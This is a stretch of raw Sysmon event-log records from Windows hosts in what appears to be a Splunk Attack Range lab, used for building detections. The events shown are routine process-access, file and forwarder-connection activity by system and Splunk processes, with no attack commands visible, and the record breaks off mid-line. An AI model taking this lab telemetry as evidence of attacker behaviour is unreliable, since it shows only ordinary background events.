10:57:44.879{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217834Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:44.879{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1328-6216-8A04-000000003902}1860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217833Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:44.879{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217832Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:44.879{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217831Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:44.879{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1328-6216-8A04-000000003902}1860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217830Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:44.880{4F8D34B0-1328-6216-8A04-000000003902}1860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217829Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:44.863{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=119220AF460FA7EDFDAC7D55D52E42EE,SHA256=21FC91FAAB0CA51FFA699E0BA209E2C39FEC467AE32B4A7C72E3A5AC5FFA29D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:44.052{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC34FF4E546DD3D6953841E7D67B2B71,SHA256=E791A6B64748EF4544C316AA6A6DC1CBF766C92BEFC0F32113C4847814628870,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:43.588{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53787-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000293346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:45.231{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F2AC-6215-B700-000000003802}4292C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:45.214{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:45.214{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\audit\audit.csvMD5=DDF0C2622258DF5AE8CB415CDCD08019,SHA256=8D6A5261E229A9B08573C28F549FA17C3A3F874B54F56CF5CC5C177B05CC6774,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:45.152{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 23542300x8000000000000000293342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:45.067{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEBEAF7428DB92376086E5E45037CA31,SHA256=54F82694F9FB25B1172424B26C7188A112C9E15606296FBD56309BF9A53D5E9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217859Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.926{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9DB1AC6FA6883EC4E2B43F143945A7BC,SHA256=04DA7D596E462B452806E4817D9B949EBB6553D58623443E1CE1F554B49D3075,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217858Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.926{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29F1AD201F52CEF48ECDB141998BB475,SHA256=A5C12560F277F598C9D45F19238C833D5541ADCA13DFB054339875320BCBB692,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217857Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:43.638{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51422-false10.0.1.12-8000- 10341000x8000000000000000217856Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.395{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1329-6216-8B04-000000003902}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217855Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.395{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217854Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.395{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217853Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.395{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217852Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.395{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217851Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.395{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217850Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.395{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217849Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.395{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217848Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.395{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217847Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.395{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217846Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.395{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1329-6216-8B04-000000003902}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217845Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.395{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1329-6216-8B04-000000003902}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217844Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.395{4F8D34B0-1329-6216-8B04-000000003902}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000217843Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.160{4F8D34B0-1328-6216-8A04-000000003902}18601232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program 